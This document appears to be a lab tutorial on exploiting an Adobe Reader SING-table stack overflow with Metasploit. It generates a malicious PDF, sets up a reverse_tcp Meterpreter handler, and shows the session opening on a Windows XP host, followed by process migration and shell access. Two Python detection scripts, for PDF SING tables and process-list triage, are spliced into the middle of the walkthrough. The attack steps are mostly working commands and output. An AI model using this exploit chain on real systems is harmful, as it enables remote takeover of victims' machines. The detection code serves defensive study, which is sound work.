Preface
Penetration testing a target with a PDF file
I. Vulnerability overview

| Test case | Description |
|---|---|
| Vulnerability | Stack overflow in the uniqueName field of the Smart INdependent Glyphlets (SING) table |
| Affected versions | Adobe Reader 9.3.4 / Acrobat 9.3.4 and earlier on Windows, Macintosh and UNIX |
II. Penetration steps
1. Generate the malicious PDF file
msf6 > use exploit/windows/fileformat/adobe_cooltype_sing
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/fileformat/adobe_cooltype_sing) > options
Module options (exploit/windows/fileformat/adobe_cooltype_sing):
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME msf.pdf yes The file name.
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.1.113 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
**DisablePayloadHandler: True (no handler will be created!)**
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(windows/fileformat/adobe_cooltype_sing) > exploit
[*] Creating 'msf.pdf' file...
[+] msf.pdf stored at /root/.msf4/local/msf.pdf
As shown, the malicious PDF has been generated at /root/.msf4/local/msf.pdf; it can now be delivered to the target host through some special means.
2. Start the handler on the attacker side
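From the defender's side, the interesting question is how to recognise a PDF that carries this SING-table pattern before a vulnerable Reader opens it. The following is an added detection example, not code from the original post or from Metasploit: it pulls every stream body out of a PDF (inflating FlateDecode streams), walks the table directory of any embedded sfnt font, and flags a SING table whose 28-byte uniqueName has no NUL terminator, which is the condition the overflow depends on. The byte-level stream scan, the sfnt/SING builders and the two sample PDFs are constructed for the demonstration and are not real exploit data; function names are my own.

```python
import re
import struct
import zlib
from typing import Dict, List, Optional

# SING table layout (OpenType spec): eight 16-bit fields (16 bytes), then a
# 28-byte NUL-terminated uniqueName, a 16-byte METAMD5 and an 8-byte nest.
SING_UNIQUENAME_OFFSET = 16
SING_UNIQUENAME_LEN = 28
SFNT_MAGICS = (b"\x00\x01\x00\x00", b"true", b"OTTO")


def parse_sfnt_tables(font: bytes) -> Dict[str, bytes]:
    """Walk the sfnt table directory and return {tag: raw table bytes}."""
    if len(font) < 12 or font[:4] not in SFNT_MAGICS:
        return {}
    num_tables = struct.unpack(">H", font[4:6])[0]
    tables: Dict[str, bytes] = {}
    for i in range(num_tables):
        rec = 12 + 16 * i
        if rec + 16 > len(font):
            break
        tag, _checksum, offset, length = struct.unpack(">4sIII", font[rec:rec + 16])
        tables[tag.decode("latin-1")] = font[offset:offset + length]
    return tables


def check_sing_table(sing: bytes) -> Optional[str]:
    """Flag a SING table whose uniqueName is not NUL-terminated inside its 28-byte field;
    the vulnerable CoolType code trusted that terminator when copying the name to the stack."""
    field = sing[SING_UNIQUENAME_OFFSET:SING_UNIQUENAME_OFFSET + SING_UNIQUENAME_LEN]
    if len(field) < SING_UNIQUENAME_LEN:
        return "SING table is shorter than its fixed header"
    if b"\x00" not in field:
        return "SING uniqueName has no NUL terminator within 28 bytes"
    return None


def pdf_stream_bodies(pdf: bytes) -> List[bytes]:
    """Return every stream body in the PDF, inflated when it is a zlib (FlateDecode) stream.
    This is a byte-level scan, not a full PDF parser: enough for triage, not for parsing."""
    bodies = []
    for m in re.finditer(rb"stream\r?\n(.*?)\r?\nendstream", pdf, re.S):
        raw = m.group(1)
        try:
            # decompressobj tolerates a truncated tail, which the regex can occasionally cause
            out = zlib.decompressobj().decompress(raw)
            bodies.append(out or raw)
        except zlib.error:
            bodies.append(raw)
    return bodies


def scan_pdf(pdf: bytes) -> List[str]:
    """Report embedded sfnt fonts whose SING table matches the overflow pattern."""
    findings = []
    for body in pdf_stream_bodies(pdf):
        sing = parse_sfnt_tables(body).get("SING")
        if sing is not None:
            finding = check_sing_table(sing)
            if finding:
                findings.append(finding)
    return findings


# --- constructed samples (hypothetical, not real exploit data): minimal sfnt + SING ---

def build_sing(unique_name: bytes) -> bytes:
    head = struct.pack(">HHHhHHhh", 1, 0, 1, 0, 0, 1000, 0, 0)  # 16 bytes of version/permission fields
    name = unique_name[:SING_UNIQUENAME_LEN].ljust(SING_UNIQUENAME_LEN, b"\x00")
    return head + name + b"\x00" * 16 + b"\x00" * 8


def build_font(tables: Dict[bytes, bytes]) -> bytes:
    n = len(tables)
    header = struct.pack(">IHHHH", 0x00010000, n, 0, 0, 0)
    records, blobs = b"", b""
    offset = 12 + 16 * n
    for tag, data in tables.items():
        records += struct.pack(">4sIII", tag, 0, offset, len(data))
        padded = data + b"\x00" * (-len(data) % 4)  # tables are 4-byte aligned
        blobs += padded
        offset += len(padded)
    return header + records + blobs


def wrap_in_pdf(font: bytes) -> bytes:
    body = zlib.compress(font)
    hdr = b"%PDF-1.4\n1 0 obj\n<< /Length " + str(len(body)).encode() + b" /Filter /FlateDecode >>\nstream\n"
    return hdr + body + b"\nendstream\nendobj\n%%EOF\n"


BENIGN_PDF = wrap_in_pdf(build_font({b"SING": build_sing(b"Glyphlet.001")}))
SUSPECT_PDF = wrap_in_pdf(build_font({b"SING": build_sing(b"A" * 28)}))

if __name__ == "__main__":
    print("benign :", scan_pdf(BENIGN_PDF))
    print("suspect:", scan_pdf(SUSPECT_PDF))
```

The check is deliberately narrow: a NUL somewhere in the 28 bytes is what a well-formed glyphlet name always has, so the rule produces few false positives, but a scanner built on it should still be paired with a proper PDF parser, since object streams, unusual filters or split streams will slip past a regex over the raw bytes.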
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (generic/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf6 exploit(multi/handler) > set lhost 192.168.1.113
lhost => 192.168.1.113
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.1.113:4444
[*] Sending stage (175174 bytes) to 192.168.1.115
[*] Meterpreter session 1 opened (192.168.1.113:4444 -> 192.168.1.115:1878) at 2021-05-13 11:08:03 +0800
meterpreter >
As shown, the generated malicious file is now running on the target host (here, the local machine); next, some basic operations can be carried out.
Migrate to another, safer process
meterpreter > getpid
Current pid: 1144
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x86 0 NT AUTHORITY\SYSTEM
248 736 VGAuthService.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe
448 736 vmtoolsd.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
544 4 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
612 544 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
692 544 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
736 692 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
748 692 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
916 736 vmacthlp.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmacthlp.exe
932 736 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
1000 736 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
1144 736 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1276 736 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
1324 736 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\system32\svchost.exe
1384 932 wmiprvse.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\wbem\wmiprvse.exe
1516 736 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1524 1760 rundll32.exe x86 0 WINXP-1\st21 C:\WINDOWS\system32\rundll32.exe
1532 1144 wscntfy.exe x86 0 WINXP-1\st21 C:\WINDOWS\system32\wscntfy.exe
1544 736 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1608 1760 vmtoolsd.exe x86 0 WINXP-1\st21 C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
1704 1760 ctfmon.exe x86 0 WINXP-1\st21 C:\WINDOWS\system32\ctfmon.exe
1760 1732 explorer.exe x86 0 WINXP-1\st21 C:\WINDOWS\Explorer.EXE
1924 736 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\system32\svchost.exe
1932 736 alg.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\System32\alg.exe
2060 1760 cmd.exe x86 0 WINXP-1\st21 C:\WINDOWS\system32\cmd.exe
2116 1760 IEXPLORE.EXE x86 0 WINXP-1\st21 C:\Program Files\Internet Explorer\iexplore.exe
2476 736 metsvc.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\TEMP\MWPrEozxdnwJwU\metsvc.exe
3368 3348 phpStudy.exe x86 0 WINXP-1\st21 C:\phpStudy\phpStudy.exe
3424 3368 httpd.exe x86 0 WINXP-1\st21 C:\phpStudy\PHPTutorial\Apache\bin\httpd.exe
3432 3368 mysqld.exe x86 0 WINXP-1\st21 C:\phpStudy\PHPTutorial\MySQL\bin\mysqld.exe
3440 3400 conime.exe x86 0 WINXP-1\st21 C:\WINDOWS\system32\conime.exe
3568 3424 httpd.exe x86 0 WINXP-1\st21 C:\phpStudy\PHPTutorial\Apache\bin\httpd.exe
meterpreter > migrate 1760
[*] Migrating from 1144 to 1760...
[*] Migration completed successfully.
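The same `ps` listing is what an incident responder works from, and it already contains a triage signal: a process called metsvc.exe (the name Metasploit's persistence service uses) running out of C:\WINDOWS\TEMP. The following added example, which is mine and not part of the original post, parses an excerpt of the listing above (copied from the page with columns collapsed to single spaces) and applies three simple host-triage rules: an image running from a temp directory, an svchost.exe whose parent is not services.exe, and a core system binary name running from outside System32. The regular expression, the rule set and the `triage` function are my own and are tuned to this XP-era column layout.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Excerpt of the meterpreter `ps` listing shown above, exactly as printed on the page
# (PID PPID Name Arch Session User Path, separated by single spaces).
PS_OUTPUT = r"""
0 0 [System Process]
4 0 System x86 0 NT AUTHORITY\SYSTEM
544 4 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
612 544 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
692 544 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
736 692 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
748 692 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
1000 736 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
1144 736 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1532 1144 wscntfy.exe x86 0 WINXP-1\st21 C:\WINDOWS\system32\wscntfy.exe
1760 1732 explorer.exe x86 0 WINXP-1\st21 C:\WINDOWS\Explorer.EXE
2060 1760 cmd.exe x86 0 WINXP-1\st21 C:\WINDOWS\system32\cmd.exe
2476 736 metsvc.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\TEMP\MWPrEozxdnwJwU\metsvc.exe
"""

# The user column may contain spaces ("NT AUTHORITY\NETWORK SERVICE"), so the path is
# recognised by how it starts: a drive letter, the \??\ prefix, or \SystemRoot\.
PS_LINE = re.compile(
    r"^(?P<pid>\d+)\s+(?P<ppid>\d+)\s+(?P<name>\S+)\s+(?P<arch>x86|x64)\s+(?P<session>\d+)\s+"
    r"(?P<user>.+?)(?:\s+(?P<path>(?:[A-Za-z]:\\|\\\?\?\\|\\SystemRoot\\).*))?$"
)


@dataclass
class Proc:
    pid: int
    ppid: int
    name: str
    user: str
    path: Optional[str]


def parse_ps(text: str) -> List[Proc]:
    procs = []
    for line in text.strip().splitlines():
        m = PS_LINE.match(line.strip())
        if m:  # "[System Process]" has no arch/session/user columns and is skipped
            procs.append(Proc(int(m["pid"]), int(m["ppid"]), m["name"], m["user"], m["path"]))
    return procs


# Binaries that on Windows XP only legitimately run from the system directory.
SYSTEM32_ONLY = {"smss.exe", "csrss.exe", "winlogon.exe", "services.exe", "lsass.exe", "svchost.exe"}


def triage(text: str) -> List[str]:
    """Apply three host-triage rules to a parsed process list and return the findings."""
    procs = parse_ps(text)
    by_pid: Dict[int, Proc] = {p.pid: p for p in procs}
    findings = []
    for p in procs:
        name, path = p.name.lower(), (p.path or "").lower()
        if re.search(r"\\temp\\", path):
            findings.append(f"pid {p.pid} {p.name}: image runs from a temp directory ({p.path})")
        if name == "svchost.exe":
            parent = by_pid.get(p.ppid)
            if parent is None or parent.name.lower() != "services.exe":
                findings.append(f"pid {p.pid} svchost.exe: parent is not services.exe (ppid {p.ppid})")
        if name in SYSTEM32_ONLY and path and "\\system32\\" not in path:
            findings.append(f"pid {p.pid} {p.name}: system binary name outside System32 ({p.path})")
    return findings


if __name__ == "__main__":
    for finding in triage(PS_OUTPUT):
        print(finding)
```

On this listing only the temp-directory rule fires, on pid 2476. Note what the rules cannot see: the Meterpreter session itself lives inside pid 1144, a legitimately named svchost.exe with the expected parent and path, and after `migrate 1760` it lives inside explorer.exe. Process-list triage catches dropped artefacts; catching injected code needs memory inspection or the originating event (Reader spawning an unexpected child, an outbound connection from the Reader or Explorer process).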
List the target host's network information
meterpreter > ipconfig
Interface 1
============
Name : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU : 1520
IPv4 Address : 127.0.0.1
Interface 2
============
Name : AMD PCNET Family PCI Ethernet Adapter - rface
Hardware MAC : 00:0c:29:95:e3:e1
MTU : 1500
IPv4 Address : 192.168.1.115
IPv4 Netmask : 255.255.255.0
Interface 65540
============
Name : Bluetooth `�
Hardware MAC : 94:b8:6d:d2:53:f2
MTU : 1500
Drop into a shell
meterpreter > shell
Process 1452 created.
Channel 1 created.
Microsoft Windows XP [版本 5.1.2600]
(C) 版权所有 1985-2001 Microsoft Corp.
C:\Documents and Settings\st21>ls
ls
'ls' 不是内部或外部命令，也不是可运行的程序
或批处理文件。
C:\Documents and Settings\st21>dir
dir
驱动器 C 中的卷没有标签。
卷的序列号是 5436-1D2F
C:\Documents and Settings\st21 的目录
2021-04-14 10:42 <DIR> .
2021-04-14 10:42 <DIR> ..
2021-03-23 21:19 <DIR> Favorites
2021-03-23 21:19 <DIR> My Documents
2021-03-23 21:07 <DIR> 「开始」菜单
2021-04-26 13:19 <DIR> 桌面
0 个文件 0 字节
6 个目录 38,396,850,176 可用字节
C:\Documents and Settings\st21>
Summary
This article briefly introduced using Metasploit to generate a malicious PDF file for penetration testing a target host; for learning purposes only.